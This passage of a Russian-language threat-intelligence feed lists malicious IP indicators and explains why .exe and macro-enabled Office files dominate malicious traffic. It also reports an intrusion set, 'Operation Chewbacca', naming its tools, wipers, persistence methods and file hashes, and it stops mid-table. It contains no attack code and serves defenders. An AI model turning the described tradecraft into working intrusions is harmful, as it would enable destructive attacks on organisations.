<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/0810c649-cca5-44e7-b5a0-c247cfade8c4" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.89.52.163</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/2ef95897-7820-4e30-aa4a-f9659d414633" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.89.111.233</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/3012ef2f-2f68-4a2d-aeef-3e0063c24fa6" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.129.242.236</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/d1cf0ff3-eb99-48be-b19e-23258958e665" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.135.164.207</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/f8903424-cd11-49d0-a0a9-364be89fcca4" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.142.36.207</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/e7c7181c-9a92-4619-9fb1-66e2301b9148" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.150.64.118</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/a3312fa6-08a8-47f3-af11-a4c087eafb48" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.150.64.131</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/33de5be9-7ba0-4c84-9c48-9e8f14fe8eac" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.155.249.165</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/ff3662ae-a3c9-4ba8-8de4-691fcc2c76c9" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.159.248.127</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b0126dfb-c955-455e-a73d-ffc55e6f733b" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.159.248.251</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/7aa008f9-6dde-4e59-859c-75f19ae37957" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.197.133.82</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b04def4f-b9fe-4a5c-89b5-d2a7612e42cb" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>46.28.70.26</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/0a771f19-09cf-4656-95ab-ecdb58d5ba02" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>46.28.70.244</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/17e5f241-c2df-4213-ab0e-84c265fdc693" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>62.192.174.25</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/f3627c6a-ab11-4682-a892-35374a883bf3" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>62.192.174.33</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/72078baa-d9a1-48c7-8928-eb3cecb69f67" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>62.192.174.74</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/c6573500-6cfd-459e-a1e1-868261d19de7" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>62.192.174.87</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/44568572-22d7-4800-8d92-cb7644825be3" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>62.192.174.151</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/484ebfd0-77ff-4939-abf3-7281dd1ba5fc" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>62.192.174.189</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/ca69b0a8-0306-4011-a882-f7a646074781" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>62.192.174.219</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/a449a57e-0add-42d4-9b21-34ef505a51a4" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>62.233.57.162</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/6e50eeb4-d2f7-49cd-b688-77d465637daf" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>79.132.130.73</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/5719aa06-1be8-4f29-8a08-2fc9a5d21b04" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>81.22.132.87</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/d71d49c9-d42b-4ac2-9172-67f3e62aba4c" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>83.217.210.129</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/663d7f6f-05dd-4bee-937c-c4522c8f2b9c" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>83.217.210.163</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/42702054-deb5-480c-814b-0808c03cb19c" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>85.208.110.57</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/dc749816-9889-4b2e-be1f-541958d7a82c" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>85.208.208.123</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/00a5116e-f232-44c8-8213-8888888aed1b" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>85.209.153.229</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/2867c968-be1e-4f1f-99c8-cc13ff08e02a" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>85.239.53.5</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/7bc5f1f0-7e4b-4b0a-9194-768f65cf6a84" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>86.104.75.160</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/9f593ec2-d394-45f5-9cea-3db20312b661" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>88.218.93.20</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/0f8a8c37-cbc8-485f-bf91-665d8faec0d3" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>89.42.142.240</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/209c48a9-229e-464e-8b93-fe6c4fab7684" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>89.124.114.178</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/834a2093-3807-4173-969c-d7e5ffdbe175" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>89.127.206.241</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/9275a654-cc8e-4bb9-9b58-5b5d729fbbd0" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>92.118.230.34</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/ac3c1085-b06c-4628-b5a2-34d9e9049219" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>93.183.92.96</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/e1be4332-0fea-4f37-aeb7-a36ffeda41c1" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>94.130.255.130</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/3999ecc6-1240-4b29-a5ac-744d1eb2b92a" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>94.130.255.132</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/db3f1d4d-519e-431f-a823-fc56747d25a7" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>94.130.255.151</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/fd099f79-d1e5-4844-a7a7-4da89d33a347" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>94.131.100.138</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/350f2ccd-aa35-494a-a1c1-b63af4b38802" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>94.131.111.91</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/0b0f39f2-4ba0-4f99-aa76-418497adacf9" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>94.131.118.221</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/bfe6299f-7bf6-4214-8f7e-8327ab033e22" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>94.131.120.179</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/c386dfee-8e09-415f-b877-fff3ec39db14" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>94.131.122.189</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/56ec2eb6-ff91-4a5f-8ea4-0f602ed669b3" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>95.164.86.41</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/254b4cb1-98c2-4e2a-8206-113eddfe451e" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>95.216.232.141</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/aab05bde-0e67-4042-b7e4-1699b1471746" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>103.213.249.128</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/48f44458-e6b8-4e99-ab4a-5807effdd365" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>109.172.31.68</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/a97769ae-13fe-4dea-8b07-1399e670aec6" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>135.181.14.151</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/a1592243-41f9-45a9-b9a2-e648b762feb3" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>136.243.118.134</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/bafe5944-ccb5-41ad-8485-7c5a7fe7bae2" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>144.76.48.41</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/3f82c801-794e-496c-9d50-4cf13b209d66" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>148.251.240.89</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/19b3e5a8-1ac8-4ff5-a0a8-e3c2a850b975" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>157.90.14.184</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/239a2d5b-9353-4391-af5f-7141de3ef10e" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>157.90.14.191</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/8ff94a9a-756b-4f16-a126-ebc6688cd5ba" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>159.69.228.231</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/a76fae87-d306-490e-baaf-b2a7022d40f0" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>170.168.15.160</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/f9e47ab6-b53c-4ae9-88d1-babc1931c9de" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>176.120.67.190</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/4935d0f1-eafb-4072-ba8f-cb8a6c620e9a" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>176.124.222.67</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/203dbaee-6a7f-466a-a2d9-e9e20d0ea565" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>176.124.222.69</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/ea374a34-ed87-49b0-b82f-4bf846688002" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>185.68.21.191</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/1f22da70-dba6-4a3d-b55f-d667fed741b8" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>185.113.139.34</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/81742e63-73b3-4623-96a9-3e1385ee940d" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>185.113.139.67</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b3a62dfb-0604-49c3-b3eb-3168ca098142" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>185.113.139.143</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/a3621be6-b21f-4f0f-9086-6f5e98be1af2" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>185.240.103.235</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/2e614626-dbfc-41cb-94b6-8c2ca74124a1" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>185.246.220.35</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/1f9a1039-08c9-4c69-99b8-01389fa2da31" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>185.255.178.18</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/63608d20-d714-4ceb-9c16-19f3e9555e4f" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>185.255.178.223</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b5305265-0e9c-4a76-9e39-bde0ee9d230a" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>188.40.171.83</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/7fd4d08e-0a77-4eb0-9588-85a50cdc22a5" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>193.108.114.13</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/c93c646d-e2d1-4fe1-9787-ea971c2ee4c9" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>193.124.118.189</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/d535957b-4e30-4888-a83e-b3c473d12842" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>193.233.88.253</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/5d4660b0-23a3-45d4-b126-3b05bf80a13d" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>194.87.210.125</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/371703d1-9f82-4441-856b-f4fe2e16a9cd" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>194.154.24.88</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/78a5b717-ef21-45be-a171-30fc6e3c27cf" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>194.154.25.188</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/05a5d93e-a5e8-42ba-9f68-777d2bcfc532" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>195.63.134.89</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/7182f407-7d7e-4f8b-a71a-2a3f670c9b20" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>213.218.212.19</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/d17bdc10-6644-41ff-8de4-0209cc6bd4c4" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>213.218.212.23</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/54a99aa1-a694-484c-850a-58ddcd457683" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>213.218.212.25</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/722d5bbc-4018-4e7f-9b7e-d556ee77981f" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>213.218.212.39</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/bee6f6b0-422a-4e37-8960-af279c719431" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>213.218.212.43</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/e7ddf49b-882a-46d1-9e62-600900719d36" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>213.218.212.55</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/72d7ee90-6e5e-4c84-8311-0f4265f43c58" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>213.218.212.65</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/f7a8392d-6f7b-4d3b-ba79-6f7376a4652e" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>213.218.212.70</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/2c8eeaa9-3eba-40f9-a6f0-375eb3f1fca6" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>213.218.212.200</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/69cc0a44-5f0a-499c-bf08-22ae11189cdc" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
</table>
<p><span class="hashtag">#malware</span> <span class="hashtag">#android</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>.exe .docm .xlsm</title>
		<link>/exe-docm-xlsm/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Fri, 18 Sep 2026 12:12:34 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[malware]]></category>
		<guid isPermaLink="false">/exe-docm-xlsm/</guid>

					<description><![CDATA[.exe .docm .xlsm Вредоносные файлы с этими расширениями чаще всего встречаются в сетевом трафике компаний. Давайте базово разберемся, почему. 🖥 .exe — классическое расширение исполняемых файлов в Windows: двойной клик — и…]]></description>
										<content:encoded><![CDATA[<p><strong>.exe .docm .xlsm</strong></p>
<p>Вредоносные файлы с этими расширениями чаще всего встречаются в сетевом трафике компаний. Давайте базово разберемся, почему.</p>
<p>🖥 <strong>.exe — классическое расширение исполняемых файлов в Windows:</strong> двойной клик — и у вас запускается Fortnite (не осуждаем), браузер, ваш любимый мессенджер, установщик или любая другая программа. А может запуститься и Trojan или какой-нибудь другой вредонос.</p>
<p>Чаще всего вы даже не видите, что у файла именно такое расширение: по умолчанию в Windows включена функция «Скрывать расширения для зарегистрированных типов файлов», из-за чего видно только первую часть имени. И этим пользуются злоумышленники.</p>
<p>Например, они маскируют файл под что-нибудь безобидное: вместо <code>zarplaty_sep_2026.pdf.exe</code> вы увидите просто <code>zarplaty_sep_2026.pdf</code>. Подозрений не вызывает, а интерес пробуждает. Клац-клац — и бамц.</p>
<p>В общем, для самозащиты рекомендуем отключить эту функцию. Делается просто, зато вы всегда будете знать, на что именно кликаете.</p>
<p>📄 <strong>.docm и .xlsm — а это знакомые всем офисным работягам расширения документов Microsoft Office.</strong> Их часто перекидывают по электронной почте, чатам и флешкам, так что обычно они не вызывают подозрений.</p>
<p>Только что-то тут с последними буквами расширений не так — скажете вы, и будете правы. Вместо <code>x</code> в конце здесь стоит <code>m</code>, а это означает, что такие документы поддерживают макросы — небольшие программы на специальном языке VBA, которые могут выполнять действия внутри документа. Также могут попадаться расширения <code>.dotm</code> и <code>.xltm</code> — это шаблоны документов с поддержкой макросов.</p>
<p>И так же, как с <code>.exe</code>, эти расширения по умолчанию скрыты в наименовании файлов в Windows, поэтому вы просто видите иконку документа и его название.</p>
<p>Макросы — полезная штука, которая помогает автоматизировать рутинные действия в документах (с их помощью энтузиасты даже умудрились запустить DOOM прямо в Word). </p>
<p>Но ими пользуются и злоумышленники: вы открываете вроде бы обычный файл, разрешаете макросы — и на вашем компьютере выполняются заложенные в них команды. Например, они могут запустить системную команду, которая загрузит и запустит другой вредонос.</p>
<p><strong>Так вот, к чему мы это решили объяснить</strong></p>
<p>1️⃣ Внимательно следите за тем, что именно вы запускаете и какие разрешения даете.</p>
<p>2️⃣ Наши эксперты с помощью песочницы PT Sandbox проанализировали вредоносную активность, выявленную PT NAD в сетевом трафике организаций с октября 2025 года по июль 2026 года. И как раз 29% опасных файлов оказались с расширением <code>.exe,</code> а 26% — с расширениями Microsoft Office.</p>
<p>3️⃣ Как вы понимаете, эти файлы — только верхушка айсберга из вредоносов. Ниже в сетях были обнаружены и потенциально опасные инструменты, которые выглядят легитимно, различные вариации архивов и более интересные находки.</p>
<p>О них — в полной версии <a href="https://ptsecurity.com/threats-in-network-traffic/?utm_source=tg_esc&#038;utm_medium=network&#038;utm_campaign=18_09" rel="noopener" target="_blank">исследования на нашем сайте</a>.</p>
<p><span class="hashtag">#malware</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Операция Chewbacca</title>
		<link>/operation-chewbacca/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Tue, 15 Sep 2026 11:43:48 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[APT]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[TI]]></category>
		<guid isPermaLink="false">/%d0%be%d0%bf%d0%b5%d1%80%d0%b0%d1%86%d0%b8%d1%8f-chewbacca/</guid>

					<description><![CDATA[В конце июня команда PT ESC в ходе расследования инцидентов обнаружила новую группу, нацеленную как минимум на нефтегазовые компании и финансовый сектор. В ходе атак злоумышленники преследуют деструктивные цели, при этом достаточно…]]></description>
										<content:encoded><![CDATA[<p>В конце июня команда PT ESC в ходе расследования инцидентов обнаружила новую группу, нацеленную как минимум на нефтегазовые компании и финансовый сектор.</p>
<p>В ходе атак злоумышленники преследуют деструктивные цели, при этом достаточно долго сохраняют присутствие в скомпрометированной инфраструктуре.</p>
<p>При перемещении в инфраструктуре используются преимущественно <code>WinRM</code> (как правило, в сочетании с <a href="https://github.com/WinRb/winrm-fs/" rel="noopener" target="_blank">WinRb</a>) и <code>SSH</code>.</p>
<p>Для закрепления в инфраструктуре используются в основном серверные машины с большим аптаймом (<code>Windows\Linux</code>), закрепление осуществляется посредством сервисов в обоих случаях. В качестве полезных нагрузок используется широкий набор инструментов:</p>
<ul>
<li>Агенты для фреймворка <a href="https://github.com/Ne0nd0g/merlin" rel="noopener" target="_blank">merlin</a>.</li>
<li>Агент на базе <a href="https://github.com/NHAS/reverse_ssh" rel="noopener" target="_blank">reverse_ssh</a>.</li>
<li>Утилита <code>GoSocks5Proxy</code> на базе <a href="https://github.com/things-go/go-socks5" rel="noopener" target="_blank">go-socks5</a>.</li>
<li><code>ReverseProxy</code> — собственная утилита на Rust.</li>
<li>Бэкдор <code>GoRinet</code>. Использует шифрование конфига с ключом, формируемым на базе физического адреса сетевого адаптера.</li>
</ul>
<p>🐻 Для совершения деструктивных действий используется разнообразное ПО, в том числе по ряду признаков разработанное с использованием ИИ.</p>
<ul>
<li>Вайпер <code>T-Riper</code> для сетевых устройств производства <code>Cisco</code>/<code>Huawei</code> — удаление образов, сброс конфигурации устройства, ребут. Используются в сочетании с bash-скриптами для запуска по удаленным целям.</li>
<li>Кастомный вайпер для удаленного удаления данных <code>QNAP</code>.</li>
<li>Для шифрования данных на машинах под управлением ОС Windows используется комплекс ВПО, состоящий из оркестратора (с возможностью отправки отчета о прогрессе шифрования на удаленный C2). Порождение вайперов осуществляется многопоточно, причем отдельные исполняемые файлы создаются с добавлением «мусора» в оверлей для уклонения от обнаружения. Для автоматизированного распространения по сети используются файлы конфигов с указанием известных кредов ранее скомпрометированных УЗ и целевых подсетей.</li>
</ul>
<p>Также отмечено использование уязвимости <code>CVE-2026-31431</code> (<a href="https://github.com/tgies/copy-fail-c" rel="noopener" target="_blank">CopyFail</a>) для повышения привилегий, кастомного инструмента <code>CredsReseter</code> для сброса паролей УЗ Linux-подобных систем и Windows-скриптов для дампа кредов сторонних сервисов.</p>
<h2>Рекомендации:</h2>
<ul>
<li>Осуществить поиск и мониторинг индикаторов компрометации.</li>
<li>Провести сигнатурное сканирование.</li>
<li>Обновить ОС.</li>
</ul>
<h2>IoCs</h2>
<h4>Файловые индикаторы:</h4>
<table>
<tr>
<th>Name</th>
<th>MD5</th>
<th style="text-align:center">PT Fusion</th>
</tr>
<tr>
<td><code>acgid</code></td>
<td>9f7a688faf61d895a5c1d09084f16436</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/1f43e287-7d1a-45d8-a9ac-3c1bde73f353" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>cf</code></td>
<td>4c5b89504269b1d73ee5b6449559da4b</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/03639742-ad58-416f-9299-640c4c604a95" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>mnworker.exe</code></td>
<td>a6d00278363e4916c4bc6ff6f36dfe6f</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/cc009c93-fafa-4d3c-ac89-da2639210b40" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>NetConfigSvc.exe</code></td>
<td>56fd630da404d4d8c5afd17eb3506b41</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b4c8d275-6f28-4f80-b248-8cddfeaa24ea" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>NetSvcHelper.exe</code></td>
<td>272625644208beab5daa79f676efab9a</td>
